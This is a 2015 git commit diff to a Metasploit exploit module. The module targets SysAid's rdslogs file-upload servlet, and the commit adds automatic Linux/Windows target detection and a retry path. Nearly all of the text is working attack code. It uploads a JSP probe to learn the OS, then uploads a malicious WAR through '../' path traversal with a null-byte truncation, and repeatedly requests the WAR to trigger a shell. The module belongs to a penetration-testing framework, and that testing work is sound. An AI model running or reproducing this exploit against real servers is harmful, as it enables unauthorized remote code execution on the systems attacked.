Fix Linux target by trying again if exploit fails

2015-07-18 20:12:13 +01:00 · 2015-07-18 20:12:13 +01:00 · 7483e77bba
parent 2ce00d2239
commit 7483e77bba
1 changed files with 78 additions and 25 deletions
--- a/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
+++ b/modules/exploits/multi/http/sysaid_rdslogs_fle_upload.rb
@ -77,16 +77,64 @@ class Metasploit3 < Msf::Exploit::Remote
  end
  
  
-  def exploit
-    app_base = rand_text_alphanumeric(4 + rand(32 - 4))
-    tomcat_path = '../../../../'
-    servlet_path = 'rdslogs'
+  def pick_target
+    unless target.name == 'Automatic'
+      return target
+    end

+    print_status("#{peer} - Determining target")
+    os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
+    url = upload_payload(os_finder_payload, false)
+
+    res = send_request_cgi({
+      'uri'    => normalize_uri(datastore['TARGETURI'], url),
+      'method' => 'GET',
+      'cookie' => @cookie,
+      'headers' => { 'Referer' => Rex::Text.rand_text_alpha(10 + rand(10)) }
+    })
+
+    if res && res.code == 200
+      if res.body.to_s =~ /Linux/
+        register_files_for_cleanup('webapps/' + url)
+        return targets[1]
+      elsif res.body.to_s =~ /Windows/
+        register_files_for_cleanup('root/' + url)
+        return targets[2]
+      end
+    end
+
+    nil
+  end
+  
+  
+  def send_payload(war_payload, tomcat_path, app_base)
+    # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail
+    print_status("#{peer} - Uploading WAR file...")
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'),
+      'method' => 'POST',
+      'data' => Zlib::Deflate.deflate(war_payload),
+      'ctype' => 'application/octet-stream',
+      'vars_get' => {
+        'rdsName' => "../../../../#{tomcat_path}#{app_base}.war\x00"
+      }
+    })
+    
+    # The server either returns a 200 OK when the upload is successful.
+    if res && res.code == 200
+      print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")
+    else
+      fail_with(Failure::Unknown, "#{peer} - WAR upload failed")
+    end
+  end
+
+
+  def exploit
    # We need to create the upload directories before our first attempt to upload the WAR.
    print_status("#{peer} - Creating upload directory")
    bogus_file = rand_text_alphanumeric(4 + rand(32 - 4))
    send_request_cgi({
-      'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
+      'uri' => normalize_uri(datastore['TARGETURI'], 'rdslogs'),
      'method' => 'POST',
      'data' => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))),
      'ctype' => 'application/xml',
@ -95,27 +143,32 @@ class Metasploit3 < Msf::Exploit::Remote
      }
    })

+    app_base = rand_text_alphanumeric(4 + rand(32 - 4))
    war_payload = payload.encoded_war({ :app_name => app_base }).to_s
    
-    # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail
-    print_status("#{peer} - Uploading WAR file...")
-    res = send_request_cgi({
-      'uri' => normalize_uri(datastore['TARGETURI'], servlet_path),
-      'method' => 'POST',
-      'data' => Zlib::Deflate.deflate(war_payload),
-      'ctype' => 'application/octet-stream',
-      'vars_get' => {
-        'rdsName' => "#{tomcat_path}/tomcat/webapps/#{app_base}.war\x00"
-      }
-    })
+    send_payload(war_payload, 'tomcat/webapps/', app_base)
+    register_files_for_cleanup("tomcat/webapps/#{app_base}.war")

-    # The server either returns a 200 OK when the upload is successful.
-    if res && res.code == 200
-      print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment")
-      register_files_for_cleanup("tomcat/webapps/#{app_base}.war")
-    else
-      fail_with(Failure::Unknown, "#{peer} - WAR upload failed")
+    10.times do
+      select(nil, nil, nil, 2)
+
+      # Now make a request to trigger the newly deployed war
+      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
+      res = send_request_cgi({
+        'uri'    => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
+        'method' => 'GET'
+      })
+      # Failure. The request timed out or the server went away.
+      break if res.nil?
+      # Success! Triggered the payload, should have a shell incoming
+      break if res.code == 200
    end
+    print_error("#{peer} - Failed to launch payload. Trying one last time with a different path...")
+    
+    # OK this might be a Linux server, it's a different traversal path.
+    # Let's try again...
+    send_payload(war_payload, '', app_base)
+    register_files_for_cleanup("webapps/#{app_base}.war")
    
    10.times do
      select(nil, nil, nil, 2)